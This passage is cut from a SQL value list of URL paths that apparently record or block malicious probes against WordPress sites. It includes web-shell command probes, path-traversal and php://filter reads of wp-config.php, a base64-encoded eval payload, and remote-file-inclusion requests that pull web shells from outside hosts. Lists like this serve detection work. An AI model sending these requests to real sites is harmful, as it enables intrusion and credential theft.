,'/wp-class.php'),(1,'/wp-conas.php'),(1,'/wp-conff.php'),(1,'/wp-config'),(1,'/wp-config%20'),(1,'/wp-config-backup'),(1,'/wp-config-sample.php~'),(1,'/wp-config.'),(1,'/wp-config.backup'),(1,'/wp-config.bak'),(1,'/wp-config.cfg'),(1,'/wp-config.data'),(1,'/wp-config.old'),(1,'/wp-config.orig'),(1,'/wp-config.original'),(1,'/wp-config.php-bak'),(1,'/wp-config.php-n'),(1,'/wp-config.php-old'),(1,'/wp-config.php.bak'),(1,'/wp-config.php.old'),(1,'/wp-config.php.orig'),(1,'/wp-config.php.original'),(1,'/wp-config.php.save'),(1,'/wp-config.php.swo'),(1,'/wp-config.phpa'),(1,'/wp-config.phpb'),(1,'/wp-config.phpbak'),(1,'/wp-config.phpc'),(1,'/wp-config.phpnew'),(1,'/wp-config.phpold'),(1,'/wp-config.phptmp'),(1,'/wp-config.php_'),(1,'/wp-config.php_bak'),(1,'/wp-config.php_old'),(1,'/wp-config.php~'),(1,'/wp-config.php~~'),(1,'/wp-config.php~~~'),(1,'/wp-content/19169.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/19874.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/adodb.class.php'),(1,'/wp-content/archive.php'),(1,'/wp-content/assets/themes/plugins/uploadify/uploadify.php'),(1,'/wp-content/b374k-2.8.php'),(1,'/wp-content/co.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/config.php5?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/error-log.php'),(1,'/wp-content/gemb.php'),(1,'/wp-content/helpme.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/languages/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-content/languages/cache/adodb.class.php'),(1,'/wp-content/languages/session.php?ver_full&token=1257'),(1,'/wp-content/languages/themes/sys.php'),(1,'/wp-content/lib.php?ver_full&token=1257'),(1,'/wp-content/license.php'),(1,'/wp-content/login.php?login=cmd'),(1,'/wp-content/plugins/08351597.php'),(1,'/wp-content/plugins/11172305.php'),(1,'/wp-content/plugins/3586263.php'),(1,'/wp-content/plugins/500.php'),(1,'/wp-content/plugins/53594680.php'),(1,'/wp-content/plugins/64731957.php'),(1,'/wp-content/plugins/66713816.php'),(1,'/wp-content/plugins/872473.php'),(1,'/wp-content/plugins/accordion/js/swfupload/js/upload.php'),(1,'/wp-content/plugins/acismittop/akismet.php'),(1,'/wp-content/plugins/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-content/plugins/Analyser.php'),(1,'/wp-content/plugins/annvicky.php'),(1,'/wp-content/plugins/another-wordpress-classifieds-plugin/AWPCP.po'),(1,'/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php'),(1,'/wp-content/plugins/bc.php'),(1,'/wp-content/plugins/BirdsRio.php'),(1,'/wp-content/plugins/boxit/upload.php'),(1,'/wp-content/plugins/cache/adodb.class.php'),(1,'/wp-content/plugins/cachex/cached.php'),(1,'/wp-content/plugins/CarllyleElmer/JasperFitch.php?login=cmd'),(1,'/wp-content/plugins/category-grid-view-gallery/cat_grid.php'),(1,'/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'),(1,'/wp-content/plugins/cforms/noid-cforms.php'),(1,'/wp-content/plugins/cforms/noid-nctls.php'),(1,'/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'),(1,'/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php'),(1,'/wp-content/plugins/civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/complete-gallery-manager/frames/upload-images.php'),(1,'/wp-content/plugins/configbacks.php?ing=lie'),(1,'/wp-content/plugins/contact-form-7-to-database-extension/dt_i18n/.includes.php?ver_full&token=1257'),(1,'/wp-content/plugins/contact-form-7-to-database-extension/exportCSVq.php?ver_full&token=1257'),(1,'/wp-content/plugins/contact-form-7/admin/includes/.tag-generatorbackup.php?ver_full&token=1257'),(1,'/wp-content/plugins/contact-form-7/includes/js/==a?/MSIE/.test(navigator.userAgent)?e(this).replaceWith(e(this).clone(!0)):e(this).val('),(1,'/wp-content/plugins/contact-form-7/settingsorig.php?ver_full&token=1257'),(1,'/wp-content/plugins/content-flow3d/shortcode/upload.php'),(1,'/wp-content/plugins/custom-content-type-manager/auto-update.php'),(1,'/wp-content/plugins/custom-content-type-manager/index.html'),(1,'/wp-content/plugins/cysteme-finder/php/connector.php'),(1,'/wp-content/plugins/downloads-manager/page-download-template.tpl'),(1,'/wp-content/plugins/downloads-manager/single-download-template.tpl'),(1,'/wp-content/plugins/dzs-calendar/admin/upload.php'),(1,'/wp-content/plugins/dzs-portfolio/upload.php'),(1,'/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php'),(1,'/wp-content/plugins/dzs-videogallery/admin/upload.php'),(1,'/wp-content/plugins/dzs-zoomsounds/admin/upload.php'),(1,'/wp-content/plugins/Fbrrchive.php'),(1,'/wp-content/plugins/fb_linkpost/dosave.php'),(1,'/wp-content/plugins/flipbook/php.php'),(1,'/wp-content/plugins/fluid_forms/file-upload/server/php/'),(1,'/wp-content/plugins/font-uploader/font-uploader-free.php'),(1,'/wp-content/plugins/formcraft/documentation.html'),(1,'/wp-content/plugins/formcraft/file-upload/server/content/upload.php'),(1,'/wp-content/plugins/formcraft/file-upload/server/php/upload.php'),(1,'/wp-content/plugins/foxypress/uploadify/uploadify.php'),(1,'/wp-content/plugins/front-end-upload/destination.php'),(1,'/wp-content/plugins/front-end-upload/lib/plupload/examples/upload.php'),(1,'/wp-content/plugins/functions.php'),(1,'/wp-content/plugins/gallery-plugin/gallery-plugin.php'),(1,'/wp-content/plugins/gallery-plugin/upload/php.php'),(1,'/wp-content/plugins/hello.php'),(1,'/wp-content/plugins/hello.php?cmd=free'),(1,'/wp-content/plugins/hello.php?cmd=help'),(1,'/wp-content/plugins/hello.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=free'),(1,'/wp-content/plugins/hello.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/plugins/html5avmanager/lib/uploadify/custom.php'),(1,'/wp-content/plugins/infos.php'),(1,'/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/jetpack/scss/organisms/cmds.php?cmd=free'),(1,'/wp-content/plugins/jetpack/scss/organisms/cmds.php?cmd=help'),(1,'/wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php'),(1,'/wp-content/plugins/js.php'),(1,'/wp-content/plugins/license.php'),(1,'/wp-content/plugins/lightbox-plus/css/dark/images/session.php?ver_full&token=1257'),(1,'/wp-content/plugins/Login-wall-etgfb/login_wall.php'),(1,'/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=c2ZuLnBocA%3D%3D&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),(1,'/wp-content/plugins/magic-fields/MF_Constant.php'),(1,'/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=3'),(1,'/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php'),(1,'/wp-content/plugins/myshe.php'),(1,'/wp-content/plugins/ninja-forms/ninja_forms.php'),(1,'/wp-content/plugins/nmedia-user-file-uploader/doupload.php'),(1,'/wp-content/plugins/omni-secure-files/plupload/examples/upload.php'),(1,'/wp-content/plugins/onleinsfay.php'),(1,'/wp-content/plugins/page-flip-image-gallery/upload.php'),(1,'/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php'),(1,'/wp-content/plugins/php-event-calendar/server/classes/uploadify.php'),(1,'/wp-content/plugins/php-event-calendar/server/file-uploader/'),(1,'/wp-content/plugins/picturesurf-gallery/upload.php'),(1,'/wp-content/plugins/piecemaker/php.php'),(1,'/wp-content/plugins/pitchprint/system/settings.php'),(1,'/wp-content/plugins/pitchprint/uploader/'),(1,'/wp-content/plugins/pitchprint/uploader/index.php'),(1,'/wp-content/plugins/post-star-rating/psr-ajax-stars.php?p=1'),(1,'/wp-content/plugins/prism-highlight/db.php'),(1,'/wp-content/plugins/qtranslate-x/admin/css/.includes.php?ver_full&token=1257'),(1,'/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php'),(1,'/wp-content/plugins/resume-submissions-job-postings/installer.php'),(1,'/wp-content/plugins/revslider/rs-plugin/js/))&&(f=0===h?t.offsetWidth-E.width:t.offsetHeight-E.height,o[h]=u?parseFloat(m)/100*f+'),(1,'/wp-content/plugins/revslider/rs-plugin/js/),0)/100,n=h*a,o=c*a;'),(1,'/wp-content/plugins/revslider/rs-plugin/js/),f=x/w+'),(1,'/wp-content/plugins/revslider/rs-plugin/js/,u=100*(T/m)+'),(1,'/wp-content/plugins/revslider/rs-plugin/js/,u=T/w+'),(1,'/wp-content/plugins/revslider/rs-plugin/js/,x+=R+T+A+T+D+T+(M?1+-D/M:1)+'),(1,'/wp-content/plugins/revslider/rs-plugin/js/===g?(f=100*(x/d)+'),(1,'/wp-content/plugins/revslider/rs-plugin/js/==i.fullScreen?t(window).height()/i.slots:i.height/i.slots),'),(1,'/wp-content/plugins/revslider/rs-plugin/js/\\\'+I+'),(1,'/wp-content/plugins/revslider/rs-plugin/js/\\\'+n+\\\''),(1,'/wp-content/plugins/revslider/sfn.php'),(1,'/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA=='),(1,'/wp-content/plugins/rss.class.php'),(1,'/wp-content/plugins/samplc.php'),(1,'/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/sexy-contact-form/includes/fileupload/'),(1,'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'),(1,'/wp-content/plugins/sfn.php'),(1,'/wp-content/plugins/showbiz/settings/generas_settings.php'),(1,'/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php'),(1,'/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?action'),(1,'/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?path=./&action=upload_ad_image'),(1,'/wp-content/plugins/simple-dropbox-upload-form/'),(1,'/wp-content/plugins/simple-dropbox-upload-form/index.php'),(1,'/wp-content/plugins/simple-urls/class-wp-upgrade.php'),(1,'/wp-content/plugins/simple-urls/plugins.php'),(1,'/wp-content/plugins/simple-urls/sam-ajax-admin.php?action'),(1,'/wp-content/plugins/SocketIontrol.php'),(1,'/wp-content/plugins/sql_dump.php'),(1,'/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=wp-config.php'),(1,'/wp-content/plugins/text-hover/text-hovers.php'),(1,'/wp-content/plugins/thumbnail.php'),(1,'/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php'),(1,'/wp-content/plugins/translate/rss.class.php'),(1,'/wp-content/plugins/translate/wp-cros.php'),(1,'/wp-content/plugins/ubh/up.php'),(1,'/wp-content/plugins/w3-total-cache/lib/Microsoft/Http/Client/userlog.php'),(1,'/wp-content/plugins/weever-apps-20-mobile-web-apps/file-upload.php'),(1,'/wp-content/plugins/whatsmyrank-dev/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/whatsmyrank-devenc/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/woocommerce-product-options/includes/image-upload.php'),(1,'/wp-content/plugins/woodojo/bundled/woodojo-html-term-description/files.php'),(1,'/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/wordpress-seo/admin/pages/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/'),(1,'/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php'),(1,'/wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/wp-cache.php'),(1,'/wp-content/plugins/wp-checkout/vendors/timthumb.php'),(1,'/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php'),(1,'/wp-content/plugins/wp-cros.php'),(1,'/wp-content/plugins/wp-db-ajax-made/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-content/plugins/wp-db-ajax-made/shell.php'),(1,'/wp-content/plugins/wp-db-ajax-made/wp-ajax.php'),(1,'/wp-content/plugins/wp-db-backup-made/system.php'),(1,'/wp-content/plugins/wp-dreamworkgallery/js/swfupload/js/upload.php'),(1,'/wp-content/plugins/wp-easy-gallery-pro/admin/php.php'),(1,'/wp-content/plugins/wp-filemanager/fm.php'),(1,'/wp-content/plugins/wp-formgenerator/uploads/php'),(1,'/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php'),(1,'/wp-content/plugins/wp-homepage-slideshow/functions.php'),(1,'/wp-content/plugins/wp-image-news-slider/functions.php'),(1,'/wp-content/plugins/wp-lg3.php'),(1,'/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php'),(1,'/wp-content/plugins/wp-mobile-detector/'),(1,'/wp-content/plugins/wp-mobile-detector/cache/css.php'),(1,'/wp-content/plugins/wp-mobile-detector/cache/db.php'),(1,'/wp-content/plugins/wp-mobile-detector/cache/indax.php'),(1,'/wp-content/plugins/wp-mobile-detector/cache/timthumb.header.php'),(1,'/wp-content/plugins/wp-mobile-detector/cache/timthumb.header.php?ZUzP=die%28pi%28%29%29%3B'),(1,'/wp-content/plugins/wp-mobile-detector/cache/z2.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://123radiateur.nl/wp-content/uploads/wpallimport/uploads/96a13fe9ea7e43f0c2db9c8febe39bd4/db.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://185.40.4.61/oYz/wp_cashes.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://919vn.com/cache/db.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://aarc.dz/db/cache.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://goldcashin.net/modules/mod_banners/tmpl/tmp/wso.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://heroboxstudios.com/wp-content/themes/twentyfourteen/js/1.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.allerleikreatief.nl/cms/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.ghanachambertakoradi.org/tmp/db.php'),(1,'/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.relationshiptips.club/cache/db.php'),(1,'/wp-content/plugins/wp-mobile-detector/timthumb.php'),(1,'/wp-content/plugins/wp-photo-seller/languages/WPS-ja_Ja.po'),(1,'/wp-content/plugins/wp-plugins.php'),(1,'/wp-content/plugins/wp-property/action_hooks.php'),(1,'/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php'),(1,'/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/wp-symposium/server/get_profile_avatar.php'),(1,'/wp-content/plugins/wp-symposium/server/php/CZKzkUuuVuYslO.php'),(1,'/wp-content/plugins/wp-symposium/server/php/dgzdRjrpiTOdVV.php'),(1,'/wp-content/plugins/wp-symposium/server/php/EVKgipMFrMVmzj.php'),(1,'/wp-content/plugins/wp-symposium/server/php/fxTLgWJWXldoIt.php'),(1,'/wp-content/plugins/wp-symposium/server/php/gMVNtkVzxArtso.php'),(1,'/wp-content/plugins/wp-symposium/server/php/index.php'),(1,'/wp-content/plugins/wp-symposium/server/php/ITwPWzfchbonXs.php'),(1,'/wp-content/plugins/wp-symposium/server/php/JtpSwvOTrdHsWW.php'),(1,'/wp-content/plugins/wp-symposium/server/php/mWnarAObdkfAwg.php'),(1,'/wp-content/plugins/wp-symposium/server/php/QQMCcNCxBvZsxo.php'),(1,'/wp-content/plugins/wp-symposium/server/php/RKbLXAWkcWhxYA.php'),(1,'/wp-content/plugins/wp-symposium/server/php/tadmAOWCPAfoEe.php'),(1,'/wp-content/plugins/wp-symposium/server/php/XLnwSAcloHcxzM.php'),(1,'/wp-content/plugins/wp-symposium/server/php/zhRbrDCPBigTon.php'),(1,'/wp-content/plugins/wp-xmll_2/wp-xmll_2.php'),(1,'/wp-content/plugins/wpe-indoshipping/admin/upload-file.php'),(1,'/wp-content/plugins/wpfoot.php'),(1,'/wp-content/plugins/wpmarketplace/libs/cart.php'),(1,'/wp-content/plugins/wpwhatsmyrankvideoregular-unlimited/php-ofc-library/ofc_upload_image.php'),(1,'/wp-content/plugins/wp_api/mod_system.php'),(1,'/wp-content/plugins/wp_modx/mod_system.php'),(1,'/wp-content/popup-pomo.php'),(1,'/wp-content/security.php'),(1,'/wp-content/smoke/up.php'),(1,'/wp-content/systemcache.php'),(1,'/wp-content/themes/agritourismo-theme/functions/upload-handler.php'),(1,'/wp-content/themes/anthology/functions/upload-handler.php'),(1,'/wp-content/themes/area53-v1.0.1/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/area53-v1.0.2/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/area53-v1.0.3/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/area53-v1.0.4/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/area53-v1.0.5/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/awake/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/b374k-2.8.php'),(1,'/wp-content/themes/barracudafx/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/bordeaux-theme/functions/upload-handler.php'),(1,'/wp-content/themes/botanica-theme/functions/upload-handler.php'),(1,'/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php'),(1,'/wp-content/themes/cameleonthemeforest/includes/fileuploader/upload_handler.php'),(1,'/wp-content/themes/canvas/cache/external_0e87651953815dbe126c66e5ea6aa960.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/themes/clockstone/theme/functions/upload.php'),(1,'/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php'),(1,'/wp-content/themes/coloris-theme/functions/upload-handler.php'),(1,'/wp-content/themes/construct/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/core/includes/fileuploader/upload_handler.php'),(1,'/wp-content/themes/corporate/404.php'),(1,'/wp-content/themes/Dandelion/functions/upload-handler.php'),(1,'/wp-content/themes/dejavu/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/drochilli-child/uploadify/uploadify.php'),(1,'/wp-content/themes/echelon/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/elegance/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/eptonic-v1.4.3/functions/jwpanel/scripts/valums_uploader/php.php'),(1,'/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php'),(1,'/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php'),(1,'/wp-content/themes/felici/sprites/js/uploadify/uploadify.php'),(1,'/wp-content/themes/forca-theme/functions/upload-handler.php'),(1,'/wp-content/themes/fusion/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/gadgetine-theme/functions/upload-handler.php'),(1,'/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php'),(1,'/wp-content/themes/highlight/lib/utils/upload-handler.php'),(1,'/wp-content/themes/infocus/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/infocus/lib/scripts/dl-skin.php../../../../../wp-config.php'),(1,'/wp-content/themes/infocus2/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/kernel-theme/functions/upload-handler.php'),(1,'/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php'),(1,'/wp-content/themes/konzept/includes/uploadify/upload.php'),(1,'/wp-content/themes/license.php'),(1,'/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/lightspeed/functions/jwpanel/scripts/valums_uploader/php.php'),(1,'/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/Melos_Pro/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/mesocolumn/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/method/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/Minamaze_Pro/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/modular/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/myriad/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/myriad/lib/scripts/dl-skin.php/../../../../../wp-config.php'),(1,'/wp-content/themes/Newspaper/403.php'),(1,'/wp-content/themes/Newspaper/adodb.class.php'),(1,'/wp-content/themes/Newspaper/apache-conf.php'),(1,'/wp-content/themes/Newspaper/content-help.php'),(1,'/wp-content/themes/Newspaper/content-wp-access.php'),(1,'/wp-content/themes/Newspaper/content-wp-authority.php'),(1,'/wp-content/themes/Newspaper/dir.php'),(1,'/wp-content/themes/Newspaper/error-log.php'),(1,'/wp-content/themes/Newspaper/help.php'),(1,'/wp-content/themes/Newspaper/js.php'),(1,'/wp-content/themes/Newspaper/js/%25url%25'),(1,'/wp-content/themes/Newspaper/js/login.php?login=cmd'),(1,'/wp-content/themes/Newspaper/js/\\\'%25url%25/\\\''),(1,'/wp-content/themes/Newspaper/lib.php'),(1,'/wp-content/themes/Newspaper/login.php?login=cmd'),(1,'/wp-content/themes/Newspaper/mide.php'),(1,'/wp-content/themes/newspaper/shwso.php'),(1,'/wp-content/themes/Newspaper/style.php?act=1'),(1,'/wp-content/themes/Newspaper/system.php'),(1,'/wp-content/themes/Newspaper/thanks.php'),(1,'/wp-content/themes/Newspaper/wp-ajax.php'),(1,'/wp-content/themes/Newspaper/wp-security.php'),(1,'/wp-content/themes/nova/cache/62eeeb5487f0cf2abd5de7147b8cd07a.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/themes/nuance-v1.2.3/functions/jwpanel/scripts/valums_uploader/php.php'),(1,'/wp-content/themes/nuance-v1.2.4/functions/jwpanel/scripts/valums_uploader/php.php'),(1,'/wp-content/themes/Nuance/functions/jwpanel/scripts/valums_uploader/php.php'),(1,'/wp-content/themes/omega/images/session.php?ver_full&token=1257'),(1,'/wp-content/themes/optimizepress/lib/admin/media-upload.php'),(1,'/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php'),(1,'/wp-content/themes/persuasion/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php'),(1,'/wp-content/themes/pinword-theme/functions/upload-handler.php'),(1,'/wp-content/themes/pk2011_itis/parkerandkent2011/js/theme/prettyPhoto/images/prettyPhoto/light_rounded/rss.class.php'),(1,'/wp-content/themes/profoblog20/functions/colorpicker/thumbs.php'),(1,'/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/ini.php'),(1,'/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/thumbs.php'),(1,'/wp-content/themes/profoblog20/functions/jquery-ui/thumbs.php'),(1,'/wp-content/themes/profoblog20/js/helpers/thumbs.php'),(1,'/wp-content/themes/project10-theme/functions/upload-handler.php'),(1,'/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php'),(1,'/wp-content/themes/radial-theme/functions/upload-handler.php'),(1,'/wp-content/themes/rayoflight-theme/functions/upload-handler.php'),(1,'/wp-content/themes/rayoflight/functions/upload-handler.php'),(1,'/wp-content/themes/reganto-theme/functions/upload-handler.php'),(1,'/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php'),(1,'/wp-content/themes/rockstar-theme/functions/upload-handler.php'),(1,'/wp-content/themes/royale/admin/upload.php'),(1,'/wp-content/themes/royale/plugins/dzs-portfolio/upload.php'),(1,'/wp-content/themes/royale/plugins/dzs-wall/admin/dzsuploader/upload.php'),(1,'/wp-content/themes/rss.class.php'),(1,'/wp-content/themes/s/admin/dzsuploader/upload.php'),(1,'/wp-content/themes/s/plugins/dzs-piecemaker/admin/dzsuploader/upload.php'),(1,'/wp-content/themes/saico/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/satoshi/upload-file.php'),(1,'/wp-content/themes/sketch/404.php'),(1,'/wp-content/themes/skinizer/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/sportimo-theme/functions/upload-handler.php'),(1,'/wp-content/themes/steam/css/_notes/rss.class.php'),(1,'/wp-content/themes/switchblade-v1.3/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php'),(1,'/wp-content/themes/Terra/images/prettyPhoto/dark_square/rss.class.php'),(1,'/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php'),(1,'/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php'),(1,'/wp-content/themes/twentyeleven/404.php'),(1,'/wp-content/themes/twentyfifteen/wp-installation.php'),(1,'/wp-content/themes/twentyfourteen/genericons/font/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-content/themes/twentyfourteen/genericons/font/thumbs.php'),(1,'/wp-content/themes/twentyfourteen/images/functions.php?ver_full&token=1257'),(1,'/wp-content/themes/twentyten/404.php'),(1,'/wp-content/themes/twentytwelve/404.php'),(1,'/wp-content/themes/twentytwelve/inc/main.php'),(1,'/wp-content/themes/twentytwelve/interface.php'),(1,'/wp-content/themes/versatile/lib/scripts/dl-skin.php'),(1,'/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php'),(1,'/wp-content/themes/WPStore/upload/'),(1,'/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php'),(1,'/wp-content/thumb.php'),(1,'/wp-content/timthumb.php'),(1,'/wp-content/upgrade/theme-compat/11.php'),(1,'/wp-content/upgrade/theme-compat/popup-pomo.php'),(1,'/wp-content/upgrade/theme-compat/wp-functions.php'),(1,'/wp-content/upgrade/theme-compat/wp-up.php'),(1,'/wp-content/upgradez.php'),(1,'/wp-content/uploads/08225562.php'),(1,'/wp-content/uploads/0830960.php'),(1,'/wp-content/uploads/15339494.php'),(1,'/wp-content/uploads/1927525.php'),(1,'/wp-content/uploads/2012/07/rss.class.php'),(1,'/wp-content/uploads/2012/09/ms-default-base.php'),(1,'/wp-content/uploads/2014/ini.php'),(1,'/wp-content/uploads/2015/03/info.php'),(1,'/wp-content/uploads/2015/05/Jep-Robertson.jpg&imgrefurl='),(1,'/wp-content/uploads/2015/06/Ariana-Grande-'),(1,'/wp-content/uploads/2015/06/rss.class.php'),(1,'/wp-content/uploads/2015/06/wp-cros.php'),(1,'/wp-content/uploads/2015/08/new_up.php?cmd=free'),(1,'/wp-content/uploads/2015/08/new_up.php?cmd=help'),(1,'/wp-content/uploads/2015/09/class-wp-upgrade.php'),(1,'/wp-content/uploads/2015/09/new_up.php?cmd=free'),(1,'/wp-content/uploads/2015/09/new_up.php?cmd=help'),(1,'/wp-content/uploads/2015/09/new_up.php?test=1'),(1,'/wp-content/uploads/2015/09/update.php?q=pass34'),(1,'/wp-content/uploads/2015/10/1445911123.php?cmd=free'),(1,'/wp-content/uploads/2015/10/1445911123.php?cmd=help'),(1,'/wp-content/uploads/2015/10/class-wp-upgrade.php'),(1,'/wp-content/uploads/2015/10/new_up.php?cmd=free'),(1,'/wp-content/uploads/2015/10/new_up.php?cmd=help'),(1,'/wp-content/uploads/2015/10/new_up.php?test=1'),(1,'/wp-content/uploads/2015/10/update.php?q=pass34'),(1,'/wp-content/uploads/2015/10/wp-license.php'),(1,'/wp-content/uploads/2015/11/1447116770.php?cmd=free'),(1,'/wp-content/uploads/2015/11/1447116770.php?cmd=help'),(1,'/wp-content/uploads/2015/11/1447212766.php?cmd=free'),(1,'/wp-content/uploads/2015/11/1447212766.php?cmd=help'),(1,'/wp-content/uploads/2015/11/1447212895.php?cmd=free'),(1,'/wp-content/uploads/2015/11/1447212895.php?cmd=help'),(1,'/wp-content/uploads/2015/11/class-wp-upgrade.php'),(1,'/wp-content/uploads/2015/11/new_up.php?cmd=free'),(1,'/wp-content/uploads/2015/11/new_up.php?cmd=help'),(1,'/wp-content/uploads/2015/11/new_up.php?test=1'),(1,'/wp-content/uploads/2015/11/update.php?q=pass34'),(1,'/wp-content/uploads/2015/11/wp-license.php'),(1,'/wp-content/uploads/2015/12/class-wp-customize-perl.php'),(1,'/wp-content/uploads/2015/12/class-wp-mail.php'),(1,'/wp-content/uploads/2015/12/new_up.php?cmd=free'),(1,'/wp-content/uploads/2015/12/new_up.php?cmd=help'),(1,'/wp-content/uploads/2015/12/new_up.php?test=1'),(1,'/wp-content/uploads/2015/12/update.php?q=pass34'),(1,'/wp-content/uploads/2015/css_.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/uploads/2016/01/new_up.php?cmd=free'),(1,'/wp-content/uploads/2016/01/new_up.php?cmd=help'),(1,'/wp-content/uploads/2016/01/new_u